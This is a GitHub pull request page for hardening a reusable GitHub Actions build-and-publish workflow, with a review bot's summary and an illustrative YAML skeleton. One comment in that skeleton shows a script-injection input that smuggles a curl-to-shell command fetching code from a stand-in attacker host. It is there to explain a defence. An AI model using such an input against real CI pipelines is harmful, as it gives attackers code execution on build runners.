refactor(ci): harden reusable build/publish workflow and standardize action output #101

Merged: omarghatasheh merged 2 commits into main from update/sw-cicd on Jun 15, 2026

Conversation

@MusaMisto (Member) commented Jun 15, 2026

Summary

Hardens the reusable build-and-publish-artifacts pipeline against current GitHub
Actions best practices and standardizes log/annotation output across the repo's
composite actions. Three themes: security/least-privilege, reliability, and
developer experience (cleaner logs). No change to the public input/secret/output
contract of the reusable workflow.

Reusable workflow (reusable-build-and-publish-artifacts.yml)

Security & least privilege

  • Top-level permissions dropped to contents: read; each job now escalates only
    what it needs (version→read, nuget/ci→read + packages: write,
    tag→contents: write). Removes the blanket contents: write previously granted
    to every job.
  • Script-injection hardening: all ${{ … }} values are passed via env: and
    referenced as $VAR inside run: blocks (no direct interpolation into shell).
  • persist-credentials: false on the ci/nuget checkouts (neither pushes via git).
  • Header documents a fork-PR / pull_request_target safety warning for callers.

Reliability

  • Added concurrency (per-ref, cancel-in-progress: false) so concurrent runs can't
    race the tag-based semver and collide when tagging — without interrupting an
    in-flight registry push.
  • Git tag creation moved to a final tag job that runs only after version + ci
    (and nuget, when present) succeed, so tags never point at an unpublished build.
  • timeout-minutes on every job.
  • Chart.yaml/values.yaml edits switched from line-oriented sed to structural yq
    (preserves sibling/unrelated keys; creates appVersion if absent), plus a
    helm lint gate before packaging.

Performance

  • NuGet restore caching in the dotnet-build composite (~/.nuget/packages, keyed on
    project/package manifests). Docker layer caching (type=gha) was already in place.

Output cleanup (reusable workflow + 16 composite actions)

Aligns all actions with GitHub guidance that annotations are for sparse, actionable
signals while job summaries / collapsible groups carry rich output:

  • Removed every "Job Started" and per-step "✅ success" ::notice:: (annotation-panel
    spam). The pipeline now emits one run-level ::notice:: — a pointer to the
    published artifact.
  • Success/status info preserved as lines inside ::group::s; console key/value
    output aligned.
  • Degradation/skip cases promoted from invisible echo "Warning:" to real
    ::warning:: annotations.
  • Per-action ::error:: failure annotations retained unchanged.

Behavior change to note for reviewers

The git tag is now created after a successful build (was up-front). A green run
tags at the very end; anything keyed on the tag appearing early will see it last.
This is the intended fix for orphaned tags from failed builds.

Verification

  • actionlint on the workflow: clean (validates expressions incl. the tag job's
    if:, and shellchecks run: steps).
  • bash -n across all 96 run: blocks (workflow + composites): 0 syntax errors.
  • yq metadata logic executed against real Chart.yaml/values.yaml fixtures
    (mikefarah v4): version/appVersion/image.repository/image.tag set correctly,
    sibling and unrelated keys preserved.
  • YAML parse, ::group::/::endgroup:: balance, and annotation inventory verified
    across all 17 files; diffs are output-only; no trailing whitespace introduced.

Not covered: a live end-to-end run (requires hosted runner, real secrets, and
GHCR/registry auth) — concurrency/tag-timing and registry push are unproven locally.

Summary by CodeRabbit

  • New Features

    • Introduced a new reusable GitHub Actions workflow for building, testing, and publishing Docker images and Helm charts with automatic semantic versioning and multi-platform support.
    • Added NuGet package caching for significantly faster build times.
  • Chores

    • Simplified and improved CI/CD status messaging, checkpoint tracking, and error/warning reporting across all build actions for better clarity.
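The hardening points listed in the description above (read-only workflow-level permissions with per-job escalation, env: indirection for every ${{ … }} expression, persist-credentials: false on checkouts that never push, per-ref concurrency without cancel-in-progress, structural yq edits of Chart.yaml, and a tag job gated on the publish jobs) assembled into one trimmed workflow_call skeleton. This is an added illustration, not the PR's own reusable-build-and-publish-artifacts.yml; the job names, the composite-action paths under ./.github/actions/, the input names and the single chart-name validation are assumptions made here.

```yaml
# Added example, not the simplify9/.github workflow itself: a trimmed
# workflow_call skeleton applying the PR's hardening points together. Job
# names, composite-action paths and input names are assumptions.
on:
  workflow_call:
    inputs:
      chart-name:
        required: true
        type: string
      nuget-projects:
        required: false
        type: string

# Least privilege: the workflow-level grant is read-only; jobs escalate below.
permissions:
  contents: read

# One run per ref at a time, so two runs cannot derive the same next SemVer and
# race to tag; cancel-in-progress: false lets an in-flight registry push finish.
concurrency:
  group: build-publish-${{ github.ref }}
  cancel-in-progress: false

jobs:
  version:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    outputs:
      version: ${{ steps.semver.outputs.version }}
    steps:
      - uses: actions/checkout@v4
        with: { fetch-depth: 0 }      # tag history is needed to derive the next SemVer
      - id: semver
        uses: ./.github/actions/determine-semver   # assumed composite action

  nuget:
    if: inputs.nuget-projects != ''   # skipped entirely when there is nothing to publish
    needs: version
    runs-on: ubuntu-latest
    timeout-minutes: 30
    permissions:
      contents: read
      packages: write
    steps:
      - uses: actions/checkout@v4
        with: { persist-credentials: false }   # this job never pushes via git
      - uses: ./.github/actions/dotnet-pack-push    # assumed composite action

  ci:
    needs: version
    runs-on: ubuntu-latest
    timeout-minutes: 45
    permissions:
      contents: read
      packages: write                 # GHCR push for the image and the OCI chart
    steps:
      - uses: actions/checkout@v4
        with: { persist-credentials: false }
      # UNSAFE (for contrast only): `run: echo "chart ${{ inputs.chart-name }}"`
      # splices the value into the script before bash runs it, so an input like
      #   x"; curl https://attacker.example/x | sh; echo "
      # executes. SAFE: expressions go through env: and are read as variables.
      - name: Validate chart name and update chart metadata
        env:
          CHART_NAME: ${{ inputs.chart-name }}
          VERSION: ${{ needs.version.outputs.version }}
        run: |
          set -euo pipefail
          actual="$(yq '.name' Chart.yaml)"
          if [ "$actual" != "$CHART_NAME" ]; then
            echo "::error title=Chart name mismatch::expected '$CHART_NAME', Chart.yaml has '$actual'"
            exit 1
          fi
          # mikefarah yq v4: strenv() reads the value from the environment instead
          # of splicing it into the expression; sibling keys are preserved.
          yq -i '.version = strenv(VERSION) | .appVersion = strenv(VERSION)' Chart.yaml
          helm lint .

  tag:
    # always() lets the job be evaluated although nuget may have been skipped;
    # the explicit result checks stop it from running after any failure.
    if: >-
      always() &&
      needs.version.result == 'success' &&
      needs.ci.result == 'success' &&
      (needs.nuget.result == 'success' || needs.nuget.result == 'skipped')
    needs: [version, nuget, ci]
    runs-on: ubuntu-latest
    timeout-minutes: 5
    permissions:
      contents: write               # the only job allowed to write to the repo
    steps:
      - uses: actions/checkout@v4
        with: { persist-credentials: false }   # the push authenticates with an explicit token
      - name: Create and push version tag
        env:
          VERSION: ${{ needs.version.outputs.version }}
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          set -euo pipefail
          git tag "v${VERSION}"
          git push "https://x-access-token:${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}.git" "refs/tags/v${VERSION}"
```

A called workflow can only narrow what the caller granted, so the caller's own permissions block must still allow contents: write and packages: write for the tag and publish jobs to receive those scopes. The unsafe run: form appears only inside a comment; in the live steps every expression reaches the shell as an environment variable, which is what makes a crafted input inert.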

@MusaMisto MusaMisto self-assigned this Jun 15, 2026
@MusaMisto MusaMisto added labels bug (Something isn't working), documentation (Improvements or additions to documentation), enhancement (New feature or request) Jun 15, 2026
coderabbitai (Bot) commented Jun 15, 2026

Caution: Review failed. Pull request was closed or merged during review.

Walkthrough

Across 16 composite GitHub Actions, "Announce" initialization steps are replaced with "Initialize" steps that only write pending checkpoint statuses to GITHUB_ENV, ::notice success annotations are replaced with plain echo lines, and plain warning strings are upgraded to ::warning title=... annotations. dotnet-build additionally gains a NuGet package cache step. A new 650-line reusable workflow (reusable-build-and-publish-artifacts.yml) is added that orchestrates SemVer computation, optional NuGet publishing, Docker image build/push, Helm chart update/package/OCI-push, and gated git tagging.

Changes

Logging standardization across composite actions

  • .NET build and pack/push logging + NuGet cache
    Files: .github/actions/dotnet-build/action.yml, .github/actions/dotnet-pack-push/action.yml
    dotnet-build replaces the announce step with an initialize step and adds actions/cache@v4 for ~/.nuget/packages keyed on OS and manifest file hashes. dotnet-pack-push removes ::notice announcements, upgrades missing-.csproj warnings to ::warning annotations, and simplifies post-pack/post-push echo lines.
  • Helm actions logging standardization
    Files: .github/actions/helm-deploy/action.yml, .github/actions/helm-deploy-s9generic/action.yml, .github/actions/helm-generic/action.yml, .github/actions/helm-package-push/action.yml
    All four Helm actions replace "Announce" steps with "Initialize" steps writing pending checkpoint statuses to GITHUB_ENV, convert kubeconfig-configured and chart-deployed ::notice annotations to plain echo lines, and upgrade missing image.repository/image.tag warnings to ::warning title=... annotations.
  • iOS/Xcode actions logging standardization
    Files: .github/actions/ios-install-cert/action.yml, .github/actions/ios-install-profile/action.yml, .github/actions/xcode-build/action.yml, .github/actions/xcode-export/action.yml
    Notice-based announcements replaced with dedicated initialize steps; success ::notice annotations replaced with plain echo lines; xcode-build adds a ::warning annotation for the xcpretty-missing fallback path.
  • Remaining actions logging standardization
    Files: .github/actions/determine-semver/action.yml, .github/actions/docker-build-push/action.yml, .github/actions/generate-wrangler-config/action.yml, .github/actions/setup-cloudflare-domain/action.yml, .github/actions/setup-cloudflare-project/action.yml, .github/actions/tag-github-origin/action.yml
    Announce steps replaced with initialize steps across all six actions; ::notice annotations replaced with plain echo lines; setup-cloudflare-domain upgrades two warning paths to ::warning title=... annotations; docker-build-push adds IMAGE_NAME/VERSION/DIGEST/REGISTRY env vars to confirmation steps.

New reusable build-and-publish-artifacts workflow

  • Workflow contract
    File: .github/workflows/reusable-build-and-publish-artifacts.yml (lines 1–245)
    Defines the workflow_call entrypoint with required chart-name, optional inputs for major/minor version, .NET/NuGet, Docker, and Helm configuration, secrets for registry/NuGet/PAT auth, outputs for version/docker-image/helm-chart, least-privilege permissions, and per-ref concurrency cancellation.
  • version and nuget jobs
    File: .github/workflows/reusable-build-and-publish-artifacts.yml (lines 251–347)
    version job checks out the repo and computes the next SemVer via determine-semver. Conditional nuget job (runs only when nuget-projects is non-empty) calls dotnet-build then dotnet-pack-push, followed by a publishing summary.
  • ci job: Helm validation, Docker build/push, Helm chart update/push
    File: .github/workflows/reusable-build-and-publish-artifacts.yml (lines 348–629)
    Implements four checkpoint-tracked stages: validates chart-name against Chart.yaml, builds and pushes the Docker image, updates chart version/appVersion and optional values.yaml image fields, lints/packages the chart with deterministic .tgz naming, and pushes it to GHCR as an OCI artifact. Emits failure annotations with checkpoint breakdown and writes an install snippet to the job summary.
  • tag job
    File: .github/workflows/reusable-build-and-publish-artifacts.yml (lines 630–650)
    Gates git tagging on successful version and ci jobs (with nuget success or skipped), then calls tag-github-origin using a github-token secret or fallback GITHUB_TOKEN.

Sequence Diagram(s)

sequenceDiagram
    participant caller as Caller workflow
    participant version as version job
    participant nuget as nuget job (conditional)
    participant ci as ci job
    participant tag as tag job

    caller->>version: workflow_call (major, minor, chart-name, ...)
    version->>version: determine-semver → computed version
    version-->>caller: outputs.version

    alt nuget-projects non-empty
        nuget->>nuget: dotnet-build (restore/build/test)
        nuget->>nuget: dotnet-pack-push → NuGet source
    end

    ci->>ci: validate chart-name == Chart.yaml name
    ci->>ci: docker-build-push → GHCR image + digest
    ci->>ci: update chart version/appVersion, values.yaml
    ci->>ci: helm lint + package → .tgz
    ci->>ci: helm push OCI → GHCR
    ci-->>caller: outputs.docker-image, outputs.helm-chart

    tag->>tag: tag-github-origin (version tag)

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~60 minutes

Possibly related PRs

  • simplify9/.github#16: Adds the same nuget job pattern (dotnet-build + dotnet-pack-push) that is integrated into the new reusable-build-and-publish-artifacts.yml workflow.
  • simplify9/.github#83: Modifies the same iOS composite actions (ios-install-cert, ios-install-profile, xcode-build) for checkpoint/notice logging, directly overlapping with this PR's changes to those files.
  • simplify9/.github#100: Introduces and rewires HELM_GENERIC_* checkpoint/status variables in helm-generic/action.yml, which this PR further adjusts.

Suggested reviewers

  • omarghatasheh

🐇 No more notices filling up the log,
Just plain little echoes, clear as a frog!
✅ Pending to Passed, the checkpoints align,
A workflow is born — Docker, Helm, so divine.
The bunny hops fast through each versioned deploy,
Then tags the git tree with a leap of pure joy! 🏷️

Pre-merge checks (5 passed)

  • Description Check: Passed. Check skipped - CodeRabbit’s high-level summary is enabled.
  • Title check: Passed. The PR title accurately reflects the main changes: refactoring the reusable build/publish workflow and standardizing action outputs across multiple composite actions.
  • Docstring Coverage: Passed. No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
  • Linked Issues check: Passed. Check skipped because no linked issues were found for this pull request.
  • Out of Scope Changes check: Passed. Check skipped because no linked issues were found for this pull request.

@MusaMisto MusaMisto requested a review from omarghatasheh June 15, 2026 10:17
@omarghatasheh omarghatasheh merged commit 9db1cfe into main Jun 15, 2026
1 of 2 checks passed
@omarghatasheh omarghatasheh deleted the update/sw-cicd branch June 15, 2026 10:19